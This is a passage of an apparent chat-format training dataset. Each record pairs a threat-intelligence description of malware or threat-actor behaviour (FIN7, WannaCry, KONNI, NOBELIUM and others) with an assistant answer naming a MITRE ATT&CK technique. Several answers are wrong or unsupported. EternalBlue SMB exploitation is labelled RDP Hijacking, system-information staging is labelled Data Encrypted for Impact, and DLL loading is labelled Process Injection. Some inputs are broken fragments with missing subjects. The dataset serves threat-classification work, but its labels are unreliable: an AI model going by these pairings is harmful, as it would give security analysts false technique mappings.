"role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "System info: Computer name System info using: cmd /c systeminfo >%temp%\\temp.ini List of currently running process using: cmd /c tasklist >%temp%\\temp.ini Exfiltration The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern: From (- --).txt" }, { "role": "assistant", "content": "T1082 - System Information Discovery', 'T1074 - Data Staged', 'T1057 - Process Discovery', 'T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to obtain screenshots of the compromised system." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN7 has conducted broad phishing campaigns using malicious links." }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Penquin can report the IP of the compromised host to attacker controlled infrastructure." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CosmicDuke searches for Microsoft Outlook data files with extensions .pst and .ost for collection and exfiltration." }, { "role": "assistant", "content": "T1114.001 - Email Collection: Local Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "yty collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa has downloaded additional files, including an exploit for used privilege escalation." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has delivered malicious Microsoft Office attachments via spearphishing emails." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Caterpillar WebShell has a module to download and upload files to the system." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum's installer can attempt to achieve persistence by creating a scheduled task." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a list of known credentials gathered through credential dumping to guess passwords to accounts as it spreads throughout a network." }, { "role": "assistant", "content": "T1110 - Brute Force" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naikon uses commands such as \"netsh interface show\" to discover network interface settings." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideCopy has executed malware by calling the API function `CreateProcessW`." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sandworm Team has obtained valid emails addresses while conducting research against target organizations that were subsequently used in spearphishing campaigns." }, { "role": "assistant", "content": "T1589.002 - Email Addresses" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors staged archived files in a temporary directory prior to exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike's \"beacon\" payload is capable of capturing screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The communication between the malware and the server is based on the HTTP protocol and slightly varies between the samples. Every few seconds the backdoor sends a POST request to the C&C URL. The result is encrypted and sent back to another URL on the server as the parameter of a POST request" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "48b9e25491e088a35105274cae0b9e67 MD5 hash of the current timestamp calculated during execution. MD5 hash of the current timestamp calculated during execution. 5-15 Lower/upper limits used to randomly generate sleep times as SUNSHUTTLE executes - Lower/upper limits used to randomly generate sleep times as SUNSHUTTLE executes - 0 0 or 1 — Utilize “blend-in” traffic requests. Internally called “false_requesting” - 0 Activate execution timestamp (0 by default) — execution \"activates\" or continues if current time is greater than the value in the configuration - Activate execution timestamp (0 by default) — execution \"activates\" or continues if current time is greater than the value in the configuration - - Base64-encoded User-agent used in HTTPS requests" }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Trojan will attempt to inject code into these browsers to carry out its C2 communications. To carry out C2 communications via injected code in a remote process, the injected code reaches out to the C2 server and saves the response to a memory mapped file named SNFIRNW. Command and Control Communications In addition to being able to communicate with its C2 server from code injected into a web browser, the Trojan can also carry out the same communication process within its own process" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols', 'T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX_OCEANLOTUS.D has changed permissions of a second-stage payload to an executable via \"chmod\"." }, { "role": "assistant", "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DarkWatchman can use `cmd.exe` to execute commands." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaos provides a reverse shell connection on 8338/TCP, encrypted via AES." }, { "role": "assistant", "content": "T1059.004 - Command and Scripting Interpreter: Bash', 'T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chaes has been delivered by sending victims a phishing email containing a malicious .docx file." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Prior to privilege escalation, Egregor proceeds to Active Directory reconnaissance using tools such as Sharphound or AdFind. These tools are used to gather information about users, groups, computers, and so on" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "leveraged the DDE protocol to deliver their malware." }, { "role": "assistant", "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lizar can collect the username from the system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Darkhotel malware has used a series of checks to determine if it's being analyzed; checks include the length of executable names, if a filename ends with \".Md5.exe\", and if the program is executed from the root of the C:\\ drive, as well as checks for sandbox-related libraries." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pysa has used Powershell scripts to deploy its ransomware." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "enables the Remote Desktop Protocol for persistence." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It also turns off the Windows Security Center service to prevent alerting the user about the disabled firewall" }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 has used GoldFinder to perform HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request travels through." }, { "role": "assistant", "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Malware used by can run commands on the command-line interface." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Symantec determined a more accurate picture of Buckeye’s targets by looking at where Buckeye remained active on the network longer than a day, deployed additional tools, and spread onto multiple computers" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, MCMD spawns a console process (cmd.exe) with redirected standard input and output (I/O) handles. Immediately after execution, the window properties of both the MCMD and cmd.exe processes are modified to prevent them from being visible on the active user's desktop. MCMD utilizes the shared I/O handles to send and receive data between the C2 server and the command shell (see Figure 1" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Misdat has collected files and data from a compromised host." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These files are downloaded to a directory (C:\\Users\\Public\\Libraries\\tempsys) on the infected machine by Bxaki() and xparis()" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise — usually as a download from a spam email — they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER’s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network. These observations come from system log data, CrowdStrike Falcon® sensor telemetry, and the output of the Falcon Forensic Collector (a customized version of CrowdStrike’s freely distributed community tool, CrowdResponse" }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Small Sieve can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic." }, { "role": "assistant", "content": "T1132.002 - Non-Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One version of Helminth consists of VBScript scripts." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gold Dragon terminates anti-malware processes if they’re found running on the system." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The exploit used, named EternalBlue, exploits a vulnerability in the Server Message Block (SMB) protocol which allows the malware to spread to all unpatched Windows systems from XP to 2016 on a network that have this protocol enabled. This vulnerability allows remote code execution over SMB v1. WannaCry utilizes this exploit by crafting a custom SMB session request with hard-coded values based on the target system. Notably, after the first SMB packet sent to the victim’s IP address, the malware sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5" }, { "role": "assistant", "content": "T1563.002 - Remote Service Session Hijacking: RDP Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload’s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Successful execution of the macro within the malicious document results in the installation of APT28’s signature GAMEFISH malware" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dtrack can collect a variety of information from victim machines." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware WhiskeyDelta-Two contains a function that attempts to rename the administrator’s account." }, { "role": "assistant", "content": "T1098 - Account Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, threat actors used stolen credentials to connect to the victim's network via VPN." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ROKRAT can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Since the 2016 publication, Microsoft has come across an evolution of PLATINUM’s file-transfer tool, one that uses the Intel® Active Management Technology (AMT) Serial-over-LAN (SOL) channel for communication" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay has included embedded Visual Basic scripts in malicious documents." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can perform DLL loading." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NOBELIUM has been observed modifying Azure AD to enable long-term persistence and access to sensitive information. This can include the creation of users, consent of Azure AD applications, granting of roles to users and applications, creation of additional service principal credentials, and more. In one incident, MSTIC observed the use of Azure RunCommand, paired with Azure admin-on-behalf-of (AOBO), as a technique to gain access to virtual machines and shift access from cloud to on-premise. NOBELIUM has demonstrated an ongoing interest in targeting privileged users, including Global Administrators. NOBELIUM is frequently observed conducting activities consistent with intelligence collection" }, { "role": "assistant", "content": "T1087.004 - Cloud Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lokibot has the ability to discover the domain name of the infected host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mandiant initially identified an early variant of the POSHSPY backdoor deployed as PowerShell scripts during an incident response engagement in 2015" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "deletes the original dropped file from the victim." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "menuPass has used a global service provider's IP as a proxy for C2 traffic from a victim." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "STARWHALE can establish persistence by installing itself in the startup folder, whereas the GO variant has created a `HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookM` registry key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI can steal profiles (containing credential information) from Firefox, Chrome, and Opera." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several tools encode data with base64 when posting it to a C2 server." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SysUpdate can manage services and processes." }, { "role": "assistant", "content": "T1569.002 - System Services: Service Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly 2.0 used PowerShell scripts for execution." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`." }, { "role": "assistant", "content": "T1134.004 - Access Token Manipulation: Parent PID Spoofing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Open malspam with password-protected ZIP attachment. On June 30 and July 1, 2020, we saw indications there may also have been a link to download a ZIP archive instead of an attachment. Extract Microsoft Word document from the password-protected ZIP archive using a unique password from the message text" }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth logs keystrokes from the victim's machine." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used \"net share\" and \"net view\" to identify network shares of interest." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Diavol has obfuscated its main code routines within bitmap images as part of its anti-analysis techniques." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Proxysvc performs data exfiltration over the control server channel using a custom protocol." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "concatenates then decompresses multiple resources to load an embedded .Net Framework assembly." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has established tmate sessions for C2 communications." }, { "role": "assistant", "content": "T1219 - Remote Access Software" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During its initial execution, extracts operating system information from the infected host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CSPY Downloader has been packed with UPX." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky captures PNG screenshots of the main screen." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it’s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections" }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For Operation Spalax, the threat actors used a variety of packers, including CyaX, to obfuscate malicious executables." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson contains a command to perform screen captures." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Operation Wocao has used a VBScript to conduct reconnaissance on targeted systems." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "(Source: Dell SecureWorks) To facilitate lateral movement, the adversaries deploy ASPXTool web shells to internally accessible systems running IIS" }, { "role": "assistant", "content": "T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "steals data stored in the clipboard." }, { "role": "assistant", "content": "T1115 - Clipboard Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "disguised its malicious binaries with several layers of obfuscation, including encrypting the files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as “%MYPICTURES%\\%volume serial number%“, from where it can be 